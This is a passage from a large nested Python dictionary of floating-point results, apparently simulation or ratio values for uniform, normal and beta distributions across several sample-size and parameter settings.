'nor': 15.013754159330176, 'beta1': 0.5021945895537219, 'beta2': 9.162381456103228, 'beta4': 0.19629774346862977}, 500: {'uni': 0.7588954962445985, 'nor': 10.055656119144814, 'beta1': 0.4922340597004922, 'beta2': 6.123698563556234, 'beta4': 0.20025199202983998}, 400: {'uni': 0.6997818044235432, 'nor': 8.209642023001999, 'beta1': 0.4816402192212816, 'beta2': 5.1244484441005325, 'beta4': 0.20180721973367308}, 300: {'uni': 0.6305296664843701, 'nor': 6.273332564653617, 'beta1': 0.4783208741435825, 'beta2': 3.8922181031413277, 'beta4': 0.20515722848399004}, 200: {'uni': 0.5656028930795196, 'nor': 4.372928002486701, 'beta1': 0.475973934426061, 'beta2': 2.677360291305044, 'beta4': 0.2100432666640936}, 150: {'uni': 0.5349220822574644, 'nor': 3.3411354111522917, 'beta1': 0.47500519582521517, 'beta2': 2.137164523272219, 'beta4': 0.214232307355653}, 100: {'uni': 0.5045468518311341, 'nor': 2.4340920510874984, 'beta1': 0.45888547757876796, 'beta2': 1.588903919680189, 'beta4': 0.2246944373092718}, 75: {'uni': 0.48771323589584, 'nor': 1.9342381299397664, 
'beta1': 0.459726728581532, 'beta2': 1.286504131157538, 'beta4': 0.23430910656002463}, 50: {'uni': 0.4644642299419138, 'nor': 1.4514552833852477, 'beta1': 0.45454814751513606, 'beta2': 0.9699335230442881, 'beta4': 0.24784781696012298}, 30: {'uni': 0.4630355897784532, 'nor': 1.0525485187071442, 'beta1': 0.44890325734490744, 'beta2': 0.7612572461007282, 'beta4': 0.27771911847861674}, 20: {'uni': 0.44436687230622546, 'nor': 0.8395516873431574, 'beta1': 0.45817604259495165, 'beta2': 0.6608362126367603, 'beta4': 0.31123542244036}, 10: {'uni': 0.4361704051076968, 'nor': 0.6572725764375509, 'beta1': 0.4413867755624091, 'beta2': 0.549693246598183, 'beta4': 0.35789683180043264}}, 10: {1000: {'uni': 2.71866569395543, 'nor': 40.3607988416683, 'beta1': 1.045723953486904, 'beta2': 18.264584863269278, 'beta4': 0.19340346551484838}, 750: {'uni': 2.135095878109219, 'nor': 31.335751870550318, 'beta1': 0.8686608835871902, 'beta2': 13.837281382290511, 'beta4': 0.19674409440753848}, 500: {'uni': 1.561435372670413, 'nor': 20.847843925502136, 'beta1': 0.7026497048494321, 'beta2': 9.127638494088687, 'beta4': 0.19914538106246596}, 400: {'uni': 1.3464692788145056, 'nor': 16.675073125445905, 'beta1': 0.6560756046842351, 'beta2': 7.406779998790831, 'beta4': 0.1981648542595328}, 300: {'uni': 1.0884293558360072, 'nor': 12.372459331870136, 'beta1': 0.5877835264042439, 'beta2': 5.737333836923571, 'beta4': 0.20237617530927202}, 200: {'uni': 0.8631494900499794, 'nor': 8.300996637013071, 'beta1': 0.5248229438161377, 'beta2': 3.872762504402488, 'beta4': 0.2046459202157461}, 150: {'uni': 0.746249692807121, 'nor': 6.406640972978801, 'beta1': 0.5064527635631025, 'beta2': 2.971093545391119, 'beta4': 0.20257999588678052}, 100: {'uni': 0.6390360884623073, 'nor': 4.453947014982036, 'beta1': 0.4776849499506595, 'beta2': 2.111102696976735, 'beta4': 0.20637930623052075}, 75: {'uni': 0.5746789450804921, 'nor': 3.5964267643202255, 'beta1': 0.4853289552525349, 'beta2': 1.6426532163723997, 'beta4': 
0.21022302629863826}, 50: {'uni': 0.5211310313766764, 'nor': 2.4917181735328917, 'beta1': 0.4700618462509633, 'beta2': 1.267274957963436, 'beta4': 0.2211410893248344}, 30: {'uni': 0.47804153947804207, 'nor': 1.6848055477508295, 'beta1': 0.44501316015962583, 'beta2': 0.891831606576434, 'beta4': 0.2400552361609186}, 20: {'uni': 0.4465223369536981, 'nor': 1.2624618308322546, 'beta1': 0.4422988766841338, 'beta2': 0.7196688797683929, 'beta4': 0.2604904005752692}, 10: {'uni': 0.4277837129953045, 'nor': 0.8471825992836655, 'beta1': 0.43299513108162596, 'beta2': 0.562251485700406, 'beta4': 0.30584932166436574}}}, 0.001: {1000: {1000: {'uni': 1.1936263539323357, 'nor': 2.1918383833877755, 'beta1': 1.1678025072294473, 'beta2': 6.774662646818605, 'beta4': 0.7926506036514294}, 750: {'uni': 1.1351909160899902, 'nor': 1.8986037036959484, 'beta1': 1.1407378263405077, 'beta2': 5.223023039944906, 'beta4': 0.8307779101630771}, 500: {'uni': 1.22774302421359, 'nor': 1.6238844893077675, 'beta1': 1.0804763693096529, 'beta2': 3.804599441299924, 'beta4': 0.8466317806886051}, 400: {'uni': 1.1307350302833419, 'nor': 1.5796751405899492, 'beta1': 1.2064530025809463, 'beta2': 3.3883927721160263, 'beta4': 0.9150569778427471}, 300: {'uni': 1.187305392407893, 'nor': 1.4695856313641065, 'beta1': 1.1535037606458525, 'beta2': 2.772300171422454, 'beta4': 0.8964266997411909}, 200: {'uni': 1.234831043093464, 'nor': 1.3415371409825303, 'beta1': 1.1787142641718298, 'beta2': 2.275931929701913, 'beta4': 1.00370282765997}, 150: {'uni': 1.1996709647495003, 'nor': 1.2937035420290128, 'beta1': 1.1430497852421209, 'beta2': 2.0677243693780016, 'beta4': 0.9643198579006903}, 100: {'uni': 1.1146343746429301, 'nor': 1.2892625248535499, 'beta1': 1.1776396387898163, 'beta2': 1.743862063916319, 'beta4': 1.0907431681894812}, 75: {'uni': 1.171991772371465, 'nor': 1.291285943681346, 'beta1': 1.1174834150199906, 'beta2': 1.4616564016626328, 'beta4': 1.151666583903703}, 50: {'uni': 1.154657400536598, 'nor': 
1.1767961384785905, 'beta1': 1.1536256117334385, 'beta2': 1.43287463536852, 'beta4': 1.107820297759248}, 30: {'uni': 1.1398655580396513, 'nor': 1.142777717811652, 'beta1': 1.0608317535206289, 'beta2': 1.221456001179484, 'beta4': 1.1455911895467061}, 20: {'uni': 1.1039461056449387, 'nor': 1.206766578001503, 'beta1': 1.1269090338108658, 'beta2': 1.1721728315710964, 'beta4': 1.0682592850872188}, 10: {'uni': 1.1121748796693274, 'nor': 1.0749796486931948, 'beta1': 1.0466446681695234, 'beta2': 1.1960619623270785, 'beta4': 1.0802444621913325}}, 750: {1000: {'uni': 1.137661637991768, 'nor': 2.4752561072308645, 'beta1': 1.1582570984642369, 'beta2': 6.863542226032837, 'beta4': 0.6697597937935655}, 750: {'uni': 1.1143294017010406, 'nor': 2.2785887849344943, 'beta1': 1.1814831042585445, 'beta2': 5.4011216297097295, 'beta4': 0.7167053163957068}, 500: {'uni': 1.2511652529854431, 'nor': 1.827338619863956, 'beta1': 1.1412613149111919, 'beta2': 3.8244704455741334, 'beta4': 0.8517746234898397}, 400: {'uni': 1.1399104518317567, 'nor': 1.5874288173312812, 'beta1': 1.155582328147835, 'beta2': 3.1656085392977387, 'beta4': 0.8663874082318641}, 300: {'uni': 1.2225469901339128, 'nor': 1.5167836319695944, 'beta1': 1.11153781169305, 'beta2': 2.8873516129801815, 'beta4': 0.8996920327733064}, 200: {'uni': 1.0954755318435172, 'nor': 1.3881493471941568, 'beta1': 1.2269055582277115, 'beta2': 2.262420348293941, 'beta4': 1.013070644375399}, 150: {'uni': 1.3045698538839274, 'nor': 1.3196920805811456, 'beta1': 1.1880572964427405, 'beta2': 2.0558617667281225, 'beta4': 1.005991272842099}, 100: {'uni': 1.2187792043393142, 'nor': 1.2533805083824479, 'beta1': 1.1698674176276556, 'beta2': 1.7781988429118438, 'beta4': 1.0477156844601478}, 75: {'uni': 1.1368638382518677, 'nor': 1.3156273710113595, 'beta1': 1.1384065945892738, 'beta2': 1.520728851249668, 'beta4': 1.0715347444966783}, 50: {'uni': 1.1195348740382625, 'nor': 1.2217075820491097, 'beta1': 1.1191859871430045, 'beta2': 1.3208187892571224, 'beta4': 
1.1549001358545659}, 30: {'uni': 1.2816617391006735, 'nor': 1.2457247512395753, 'beta1': 1.1579985679748264, 'beta2': 1.3374626422140403, 'beta4': 1.1743891961050419}, 20: {'uni': 1.1321158030897833, 'nor': 1.1806020500811683, 'beta1': 1.1445242993856557, 'beta2': 1.1994374982211218, 'beta4': 1.0684569229520247}, 10: {'uni': 1.0482034958303017, 'nor': 1.0837601898005667, 'beta1': 1.0616779987167078, 'beta2': 1.1126761632690636, 'beta4': 1.0098509988531303}}, 500: {1000: {'uni': 1.1750378415145837, 'nor': 3.146869341864523, 'beta1': 1.113523047098788, 'beta2': 7.532147143627789, 'beta4': 0.6366690553578839}, 750: {'uni': 1.073306431010815, 'nor': 2.785506492082125, 'beta1': 1.1569419751158654, 'beta2': 6.701734906168857, 'beta4': 0.6590873491367498}, 500: {'uni': 1.1865494646206205, 'nor': 2.1537630818158573, 'beta1': 1.1695402434000157, 'beta2': 4.861449944969511, 'beta4': 0.7573972651495522}, 400: {'uni': 1.2559700162444911, 'nor': 1.9444291825832516, 'beta1': 1.1664548294006372, 'beta2': 4.115283654847902, 'beta4': 0.7788833697755561}, 300: {'uni': 1.223882530974663, 'nor': 1.780734599585306, 'beta1': 1.181849766511381, 'beta2': 3.428927121287745, 'beta4': 0.8591100079004174}, 200: {'uni': 1.213711673102475, 'nor': 1.611703281792116, 'beta1': 1.111935660212546, 'beta2': 2.5258136249800422, 'beta4': 0.9379076876010537}, 150: {'uni': 1.1587728488156566, 'nor': 1.5088740961688971, 'beta1': 1.2536190947530212, 'beta2': 2.207157466230425, 'beta4': 0.9708178793619423}, 100: {'uni': 1.1068738509857443, 'nor': 1.4473315562593616, 'beta1': 1.2593071097914543, 'beta2': 1.9663232247120204, 'beta4': 1.039147765622215}, 75: {'uni': 1.2429995566003602, 'nor': 1.4276475545008478, 'beta1': 1.186401491303957, 'beta2': 1.632990789365755, 'beta4': 1.0812778097924176}, 50: {'uni': 1.237750828457372, 'nor': 1.2271226797959411, 'beta1': 1.1053381337393435, 'beta2': 1.4447132762085555, 'beta4': 1.0242240111478627}, 30: {'uni': 1.1636794654384857, 'nor': 1.2015932173450241, 'beta1': 
1.1623019225244076, 'beta2': 1.320761147781629, 'beta4': 1.2103259711727377}, 20: {'uni': 1.0814390552372415, 'nor': 1.1400527764284605, 'beta1': 1.122921688334151, 'beta2': 1.2343857763528272, 'beta4': 1.1103764497171464}, 10: {'uni': 1.1215480866544199, 'nor': 1.1276367261668634, 'beta1': 1.0073667103864874, 'beta2': 1.1271701321078609, 'beta4': 1.064068238786582}}, 400: {1000: {'uni': 1.1709956621544848, 'nor': 3.803301620228012, 'beta1': 1.13585237795199, 'beta2': 7.931053647459394, 'beta4': 0.5668008916694507}, 750: {'uni': 1.123912386780943, 'nor': 3.0924072026943685, 'beta1': 1.2516107775524297, 'beta2': 6.555198333395497, 'beta4': 0.6761278412053991}, 500: {'uni': 1.1277026591617652, 'nor': 2.393764811280239, 'beta1': 1.2223718878397243, 'beta2': 4.682526270468999, 'beta4': 0.7026539605570044}, 400: {'uni': 1.171201628605453, 'nor': 2.1206626700151974, 'beta1': 1.195020309009892, 'beta2': 3.7936143215751352, 'beta4': 0.7015564268374034}, 300: {'uni': 1.1813580277825309, 'nor': 1.8319129414820265, 'beta1': 1.1583260826331316, 'beta2': 3.378981432298624, 'beta4': 0.8533135186126821}, 200: {'uni': 1.1527570203950765, 'nor': 1.6492093642401482, 'beta1': 1.1250559844035837, 'beta2': 2.629417175894674, 'beta4': 0.8945750181944908}, 150: {'uni': 1.1966402773104476, 'nor': 1.4174278460172554, 'beta1': 1.1312768855343165, 'beta2': 2.2423319800521555, 'beta4': 0.9353503917519674}, 100: {'uni': 1.1487242305792935, 'nor': 1.400351252329324, 'beta1': 1.1848680122044735, 'beta2': 1.9072201207315755, 'beta4': 1.0083131263386365}, 75: {'uni': 1.1734385077355995, 'nor': 1.3826407546880082, 'beta1': 1.0956863506586716, 'beta2': 1.7219247447211712, 'beta4': 1.1086330606702113}, 50: {'uni': 1.1837137777194917, 'nor': 1.3151632039352283, 'beta1': 1.167898128515975, 'beta2': 1.4839051821122797, 'beta4': 1.0817886556398897}, 30: {'uni': 1.1650313696484893, 'nor': 1.2684226276255366, 'beta1': 1.122760714762532, 'beta2': 1.3189729090742208, 'beta4': 1.0940981521464919}, 20: {'uni': 
1.1445136060864975, 'nor': 1.1454415023439262, 'beta1': 1.0925797846896976, 'beta2': 1.267593178190832, 'beta4': 1.0882883216948513}, 10: {'uni': 1.0560264235231998, 'nor': 1.1780906323573201, 'beta1': 1.0365397983316262, 'beta2': 1.1437958793156668, 'beta4': 1.016287458324461}}, 300: {1000: {'uni': 1.1505797365385941, 'nor': 4.331982512119483, 'beta1': 1.1139526735347547, 'beta2': 9.469263809036718, 'beta4': 0.542849311740626}, 750: {'uni': 1.1758261434978927, 'nor': 3.7290481255519583, 'beta1': 1.1923496914716087, 'beta2': 7.813559953651863, 'beta4': 0.6059835632672069}, 500: {'uni': 1.181728515502452, 'nor': 2.8712256613239457, 'beta1': 1.1977959623656436, 'beta2': 5.3781790741274165, 'beta4': 0.6234478378948898}, 400: {'uni': 1.1420679660149184, 'nor': 2.3454510655315164, 'beta1': 1.2012772998377752, 'beta2': 4.64756804396548, 'beta4': 0.666155987456551}, 300: {'uni': 1.1132548996793066, 'nor': 2.2274013347829453, 'beta1': 1.0796836030332582, 'beta2': 3.4437770711726863, 'beta4': 0.8163520973610869}, 200: {'uni': 1.1695817222952798, 'nor': 1.7692957815475774, 'beta1': 1.1599743996759757, 'beta2': 2.784382083562161, 'beta4': 0.8364451298764334}, 150: {'uni': 1.1817571982797672, 'nor': 1.719512245624431, 'beta1': 1.1978025668978505, 'beta2': 2.3534864673445894, 'beta4': 0.8565768776251864}, 100: {'uni': 1.183952315096221, 'nor': 1.5311458905668298, 'beta1': 1.131782485730847, 'beta2': 2.065732436043435, 'beta4': 0.9070335463490746}, 75: {'uni': 1.1480746566834228, 'nor': 1.4155218896185913, 'beta1': 1.1645957200211898, 'beta2': 1.7843845120779571, 'beta4': 0.9973361357799707}, 50: {'uni': 1.1639419532835191, 'nor': 1.3626331228109334, 'beta1': 1.1576578080881406, 'beta2': 1.5222432381565012, 'beta4': 1.0709215102821763}, 30: {'uni': 1.2301310659161497, 'nor': 1.2519404957045004, 'beta1': 1.1315882862377566, 'beta2': 1.3482208892257823, 'beta4': 0.9920244358608241}, 20: {'uni': 1.154653019366009, 'nor': 1.2100560060524455, 'beta1': 1.2026849490243208, 'beta2': 
1.477574606464069, 'beta4': 1.0772871940370845}, 10: {'uni': 1.08910832130117, 'nor': 1.1103645382687262, 'beta1': 1.0673808704064862, 'beta2': 1.144662691366984, 'beta4': 1.0824579533858352}}, 200: {1000: {'uni': 1.1527787642817615, 'nor': 6.454939390926548, 'beta1': 1.1761298896109023, 'beta2': 12.297910366361974, 'beta4': 0.5037081183232093}, 750: {'uni': 1.2093814994351852, 'nor': 4.628672560837682, 'beta1': 1.1600526734627739, 'beta2': 9.183147402660344, 'beta4': 0.5551361589383061}, 500: {'uni': 1.2078272726618189, 'nor': 3.6466332747210433, 'beta1': 1.2130237412448794, 'beta2': 6.686631421443718, 'beta4': 0.5617242997884774}, 400: {'uni': 1.206977516155348, 'nor': 3.1488854332188554, 'beta1': 1.1540803837353022, 'beta2': 5.520291627506234, 'beta4': 0.6183140008339282}, 300: {'uni': 1.1905791517893638, 'nor': 2.6963294032580256, 'beta1': 1.1396662759898903, 'beta2': 4.265413520085283, 'beta4': 0.6410626330993713}, 200: {'uni': 1.1155796690656294, 'nor': 2.098305098276549, 'beta1': 1.129861528955905, 'beta2': 3.4165984530534477, 'beta4': 0.784023515637043}, 150: {'uni': 1.176017350862461, 'nor': 1.9602832396544383, 'beta1': 1.18064576730146, 'beta2': 2.771704811214909, 'beta4': 0.7694104604666213}, 100: {'uni': 1.1870479832591068, 'nor': 1.708131299253773, 'beta1': 1.1546257226851904, 'beta2': 2.286248548348897, 'beta4': 0.8911986069890743}, 75: {'uni': 1.186734186489011, 'nor': 1.5988674993523462, 'beta1': 1.0890720658424244, 'beta2': 1.884040222161873, 'beta4': 0.9033227590425998}, 50: {'uni': 1.1448055037301, 'nor': 1.3510145910314486, 'beta1': 1.158526641543175, 'beta2': 1.5553795378788289, 'beta4': 0.9721645833372996}, 30: {'uni': 1.115202194775155, 'nor': 1.2996741282115147, 'beta1': 1.151604190486726, 'beta2': 1.4787210055138473, 'beta4': 1.05355865908588}, 20: {'uni': 1.1079466886008744, 'nor': 1.3176829776291565, 'beta1': 1.1104919106516336, 'beta2': 1.2858026496544552, 'beta4': 1.0625767800782984}, 10: {'uni': 1.0683808504100314, 'nor': 
1.2213539981021235, 'beta1': 1.094155600283174, 'beta2': 1.1698982620724598, 'beta4': 1.0161201783101628}}, 150: {1000: {'uni': 1.2740272992236636, 'nor': 8.04791996644241, 'beta1': 1.167362655814843, 'beta2': 14.321827882861626, 'beta4': 0.5086649989916667}, 750: {'uni': 1.163578075351652, 'nor': 6.333220872122603, 'beta1': 1.1618587854601885, 'beta2': 10.078630783844831, 'beta4': 0.4866217170790821}, 500: {'uni': 1.1934251513310499, 'nor': 4.505679280354665, 'beta1': 1.1117564582293078, 'beta2': 7.5194623975801616, 'beta4': 0.5705530231959766}, 400: {'uni': 1.122035316119931, 'nor': 3.8691391166773323, 'beta1': 1.1694419741982156, 'beta2': 6.038197010971595, 'beta4': 0.6158188741996781}, 300: {'uni': 1.1470464121082826, 'nor': 3.274151981698333, 'beta1': 1.1506222290932826, 'beta2': 4.984385703067292, 'beta4': 0.6333396610313405}, 200: {'uni': 1.098044155143792, 'nor': 2.442058113795611, 'beta1': 1.190113631847934, 'beta2': 3.5693409544554564, 'beta4': 0.6585422486234873}, 150: {'uni': 1.1798570227406169, 'nor': 2.148902743538671, 'beta1': 1.1146678037413222, 'beta2': 3.040356329025905, 'beta4': 0.7390811919239978}, 100: {'uni': 1.1275603196569395, 'nor': 1.8634314040985047, 'beta1': 1.194982037114541, 'beta2': 2.4529169572961322, 'beta4': 0.7908591909063069}, 75: {'uni': 1.1010305363772324, 'nor': 1.7694707664540448, 'beta1': 1.1666529715718625, 'beta2': 2.240058572032016, 'beta4': 0.8738369125828138}, 50: {'uni': 1.0912147396467624, 'nor': 1.565184178967182, 'beta1': 1.168396593748277, 'beta2': 1.7986102324845101, 'beta4': 0.9613948793245802}, 30: {'uni': 1.176564975653703, 'nor': 1.3666259356184134, 'beta1': 1.18788036406429, 'beta2': 1.5016532133782363, 'beta4': 1.0139702282396725}, 20: {'uni': 1.095065206271104, 'nor': 1.245541829425765, 'beta1': 1.108511879249995, 'beta2': 1.307809873245305, 'beta4': 1.0376227789112373}, 10: {'uni': 1.1024407913868932, 'nor': 1.088965057821255, 'beta1': 1.047559539941666, 'beta2': 1.2305914089743843, 'beta4': 
1.0555065357965625}}, 100: {1000: {'uni': 1.1854021246412352, 'nor': 11.016060727019472, 'beta1': 1.2051656975636194, 'beta2': 15.957467784586559, 'beta4': 0.4992260856865924}, 750: {'uni': 1.2376115548225521, 'nor': 9.068522333669398, 'beta1': 1.244046634396399, 'beta2': 12.076005102020233, 'beta4': 0.5130977526919601}, 500: {'uni': 1.1648958063745838, 'nor': 6.1072839572345, 'beta1': 1.1268676414225556, 'beta2': 7.854398191492699, 'beta4': 0.49958427017588514}, 400: {'uni': 1.1512278350516503, 'nor': 5.392715793997558, 'beta1': 1.1696021387623763, 'beta2': 7.332529107921338, 'beta4': 0.5328982120077344}, 300: {'uni': 1.1043591222583407, 'nor': 4.4365428928964254, 'beta1': 1.1132005110374124, 'beta2': 5.628002146631942, 'beta4': 0.5536099970772167}, 200: {'uni': 1.1946682563618547, 'nor': 3.3521570330308985, 'beta1': 1.2773341961233582, 'beta2': 4.004404893156947, 'beta4': 0.5837234579894335}, 150: {'uni': 1.1871501213686806, 'nor': 2.6193172667330704, 'beta1': 1.2297350806502172, 'beta2': 3.2042632533037256, 'beta4': 0.664274700436926}, 100: {'uni': 1.1497621584178024, 'nor': 2.1108766254691096, 'beta1': 1.1782324016667887, 'beta2': 2.5577399519012474, 'beta4': 0.746926383653656}, 75: {'uni': 1.1351408307441955, 'nor': 1.9522867474160084, 'beta1': 1.17767812715346, 'beta2': 2.1504826050745596, 'beta4': 0.7800890585405549}, 50: {'uni': 1.1263071014294783, 'nor': 1.8648089116567583, 'beta1': 1.1165179662639755, 'beta2': 1.9238108413225985, 'beta4': 0.9041009123841088}, 30: {'uni': 1.0926805561594322, 'nor': 1.4407528275952637, 'beta1': 1.188495602696405, 'beta2': 1.4665059544892458, 'beta4': 0.9539791513025705}, 20: {'uni': 1.121846468062343, 'nor': 1.328793041952113, 'beta1': 1.1664944334710992, 'beta2': 1.4522639614141404, 'beta4': 0.9956736124755978}, 10: {'uni': 1.1204549491237221, 'nor': 1.2323011448950902, 'beta1': 1.0928258842828849, 'beta2': 1.1531922357852749, 'beta4': 1.0153739202425465}}, 75: {1000: {'uni': 1.332821520339607, 'nor': 15.930089443152745, 
'beta1': 1.171289101639284, 'beta2': 18.174364842184723, 'beta4': 0.47321284305584627}, 750: {'uni': 1.237290264475581, 'nor': 11.490043022545008, 'beta1': 1.189059377730262, 'beta2': 14.62336228067083, 'beta4': 0.5246962209488442}, 500: {'uni': 1.1921816708526098, 'nor': 8.46428457112535, 'beta1': 1.1404773815220697, 'beta2': 9.354886012350446, 'beta4': 0.5042313193695894}, 400: {'uni': 1.172495477607942, 'nor': 7.06519806952231, 'beta1': 1.1409970424303444, 'beta2': 8.453757070459439, 'beta4': 0.5275066908015517}, 300: {'uni': 1.2465428749029002, 'nor': 5.077552364373244, 'beta1': 1.2207943511424872, 'beta2': 5.989394174052176, 'beta4': 0.5145819316096251}, 200: {'uni': 1.21364225652058, 'nor': 3.793546862065341, 'beta1': 1.143576109267149, 'beta2': 4.450035842097597, 'beta4': 0.5722235640628546}, 150: {'uni': 1.1973537999124575, 'nor': 3.209445041412377, 'beta1': 1.1671496584378878, 'beta2': 3.6863319201894784, 'beta4': 0.6184152779108703}, 100: {'uni': 1.0730621748849436, 'nor': 2.515170518881428, 'beta1': 1.124202789251099, 'beta2': 2.853910469618436, 'beta4': 0.7079223488677664}, 75: {'uni': 1.1908002668890179, 'nor': 2.164307715576605, 'beta1': 1.1022232454630696, 'beta2': 2.6088159557751553, 'beta4': 0.7334138456473607}, 50: {'uni': 1.1327461894839026, 'nor': 1.7201198114580145, 'beta1': 1.1319588983511386, 'beta2': 1.875704530171311, 'beta4': 0.8228333594398864}, 30: {'uni': 1.1604850914644518, 'nor': 1.507022954768851, 'beta1': 1.1184205952563668, 'beta2': 1.7049042795022542, 'beta4': 0.9090222616137686}, 20: {'uni': 1.0762655242253933, 'nor': 1.4024810972045139, 'beta1': 1.03796705073592, 'beta2': 1.4861849386146158, 'beta4': 0.9723829285399783}, 10: {'uni': 1.0557491101661625, 'nor': 1.1837049281841963, 'beta1': 1.166904154786038, 'beta2': 1.2828863202120704, 'beta4': 0.988651200103153}}, 50: {1000: {'uni': 1.4413407568858028, 'nor': 22.566743280217178, 'beta1': 1.2276482007225256, 'beta2': 23.056210692408463, 'beta4': 0.4660189481672189}, 750: {'uni': 
1.2718280400240256, 'nor': 16.30493656353458, 'beta1': 1.1326711971589989, 'beta2': 17.81662862884342, 'beta4': 0.4728350561687182}, 500: {'uni': 1.172235040453299, 'nor': 11.8095459061109, 'beta1': 1.181820315426212, 'beta2': 11.662524110362135, 'beta4': 0.48534660865668927}, 400: {'uni': 1.2867021297441419, 'nor': 9.511213374630067, 'beta1': 1.2268838616908635, 'beta2': 9.279921733726201, 'beta4': 0.4945713984775927}, 300: {'uni': 1.1906774155008837, 'nor': 7.799766973090263, 'beta1': 1.1087965280456227, 'beta2': 7.004329940698066, 'beta4': 0.4948098176026741}, 200: {'uni': 1.206765832059108, 'nor': 5.495221421844641, 'beta1': 1.1424530528570438, 'beta2': 5.236791374243084, 'beta4': 0.5249512538272287}, 150: {'uni': 1.1170041207411467, 'nor': 4.3935496972015, 'beta1': 1.1360421454285754, 'beta2': 4.307820473968464, 'beta4': 0.5295783353350124}, 100: {'uni': 1.1694439140708475, 'nor': 3.225800948995303, 'beta1': 1.1621945829082418, 'beta2': 3.0646789563538985, 'beta4': 0.6485731805209067}, 75: {'uni': 1.1306779142265537, 'nor': 2.662959575031019, 'beta1': 1.1778740846961646, 'beta2': 2.4852673590966248, 'beta4': 0.7258091242476691}, 50: {'uni': 1.1941609396429214, 'nor': 2.268899895733848, 'beta1': 1.1179901890554762, 'beta2': 1.9249867348265446, 'beta4': 0.7226933151870409}, 30: {'uni': 1.1178041704281778, 'nor': 1.7330770857627482, 'beta1': 1.1113467743710106, 'beta2': 1.8092372960659309, 'beta4': 0.8367650025431632}, 20: {'uni': 1.083908466243809, 'nor': 1.7186907573668564, 'beta1': 1.083302381748618, 'beta2': 1.5393750399929973, 'beta4': 0.8843295960246518}, 10: {'uni': 1.0487945600677406, 'nor': 1.2709613436276843, 'beta1': 1.0965000588955878, 'beta2': 1.2197123454385659, 'beta4': 0.9498288164294515}}, 30: {1000: {'uni': 1.8025024634308071, 'nor': 34.25391130897347, 'beta1': 1.1885614558788913, 'beta2': 29.85311114615026, 'beta4': 0.44359490195802476}, 750: {'uni': 1.5718950453388483, 'nor': 25.931606992440997, 'beta1': 1.233787933808761, 'beta2': 
22.222336937321206, 'beta4': 0.47171304922279156}, 500: {'uni': 1.403990081760866, 'nor': 19.873193730295956, 'beta1': 1.2365306225266401, 'beta2': 14.658302774468805, 'beta4': 0.47265105875053215}, 400: {'uni': 1.4005854960541118, 'nor': 14.275653195236494, 'beta1': 1.214820107700645, 'beta2': 11.752460418098707, 'beta4': 0.4649244188284235}, 300: {'uni': 1.3560572497527095, 'nor': 12.509697042432672, 'beta1': 1.1642210787364398, 'beta2': 8.687500402569903, 'beta4': 0.48001789365740266}, 200: {'uni': 1.3078770132829531, 'nor': 8.242370389013965, 'beta1': 1.1516547957019738, 'beta2': 6.242815309406197, 'beta4': 0.4898507763421597}, 150: {'uni': 1.2387509836120234, 'nor': 6.212710987107977, 'beta1': 1.0759699330173904, 'beta2': 4.88761333337693, 'beta4': 0.510446983736842}, 100: {'uni': 1.231601768722487, 'nor': 4.5761367907404225, 'beta1': 1.1487740706520697, 'beta2': 3.5175168730166617, 'beta4': 0.5486902188853022}, 75: {'uni': 1.0693543659957778, 'nor': 3.951109643287017, 'beta1': 1.159979011102066, 'beta2': 3.144205840473643, 'beta4': 0.6245822913647954}, 50: {'uni': 1.142865316506463, 'nor': 2.969464463659539, 'beta1': 1.1592908541069569, 'beta2': 2.3836666468730012, 'beta4': 0.6332045220521555}, 30: {'uni': 1.0780858467029557, 'nor': 2.2574174573745505, 'beta1': 1.1744480844394878, 'beta2': 1.8478740024591505, 'beta4': 0.7343335412858117}, 20: {'uni': 1.0661001511027859, 'nor': 1.8097097184403295, 'beta1': 1.1520955489343616, 'beta2': 1.589815348006933, 'beta4': 0.799204183667358}, 10: {'uni': 1.1068513962930462, 'nor': 1.4174803659728914, 'beta1': 1.0195412075619765, 'beta2': 1.2736913537907808, 'beta4': 0.9086670084626601}}, 20: {1000: {'uni': 2.1816898666989353, 'nor': 54.589719460785915, 'beta1': 1.2780684016305557, 'beta2': 34.326668467189265, 'beta4': 0.42822336518380305}, 750: {'uni': 2.008633513369925, 'nor': 44.01386503835255, 'beta1': 1.1910602410914366, 'beta2': 25.92566104708618, 'beta4': 0.4563357309045434}, 500: {'uni': 1.7305415449208486, 'nor': 
27.626080265992513, 'beta1': 1.2716481133711786, 'beta2': 17.339855281822697, 'beta4': 0.45580442590011244}, 400: {'uni': 1.6535339448650972, 'nor': 22.71498971521692, 'beta1': 1.2541165554611715, 'beta2': 14.250093795750274, 'beta4': 0.4549406486288468}, 300: {'uni': 1.5052840944772048, 'nor': 17.85214260880071, 'beta1': 1.1639571625183778, 'beta2': 11.414421423641553, 'beta4': 0.4659886102645737}, 200: {'uni': 1.3497443785045566, 'nor': 12.360091713030048, 'beta1': 1.1717637987871659, 'beta2': 7.455419425198178, 'beta4': 0.47174970505848157}, 150: {'uni': 1.3331996994902409, 'nor': 9.288283829992508, 'beta1': 1.2506008956247794, 'beta2': 6.08397354138583, 'beta4': 0.4686509521384706}, 100: {'uni': 1.2687928512207793, 'nor': 6.558077105937877, 'beta1': 1.1613621405497763, 'beta2': 4.103340600228283, 'beta4': 0.48725121395441656}, 75: {'uni': 1.2299552447081301, 'nor': 5.171143302936504, 'beta1': 1.1199869147433412, 'beta2': 3.3288792386276485, 'beta4': 0.5273865297234503}, 50: {'uni': 1.090863672616496, 'nor': 3.700143871425098, 'beta1': 1.0922976037420196, 'beta2': 2.6115744897059754, 'beta4': 0.594876803029818}, 30: {'uni': 1.0853328914480391, 'nor': 2.646623445458865, 'beta1': 1.0736193852418847, 'beta2': 1.96046643608669, 'beta4': 0.6252246663540566}, 20: {'uni': 1.1496312474830275, 'nor': 2.003838638976139, 'beta1': 1.2149235284576705, 'beta2': 1.6737605753508866, 'beta4': 0.7318124922604088}, 10: {'uni': 1.0302973694434716, 'nor': 1.6481938151667288, 'beta1': 1.0090308312145542, 'beta2': 1.4427058937732395, 'beta4': 0.8372887168016149}}, 10: {1000: {'uni': 4.47761779649345, 'nor': 106.97243626351514, 'beta1': 1.7718712572599664, 'beta2': 50.89972781133419, 'beta4': 0.45035039981991665}, 750: {'uni': 3.524513869962408, 'nor': 77.33864323159318, 'beta1': 1.6594491239956215, 'beta2': 36.25193105958197, 'beta4': 0.45647026837978366}, 500: {'uni': 2.933652803232629, 'nor': 56.19541613997431, 'beta1': 1.412868106014215, 'beta2': 24.493194030260376, 'beta4': 
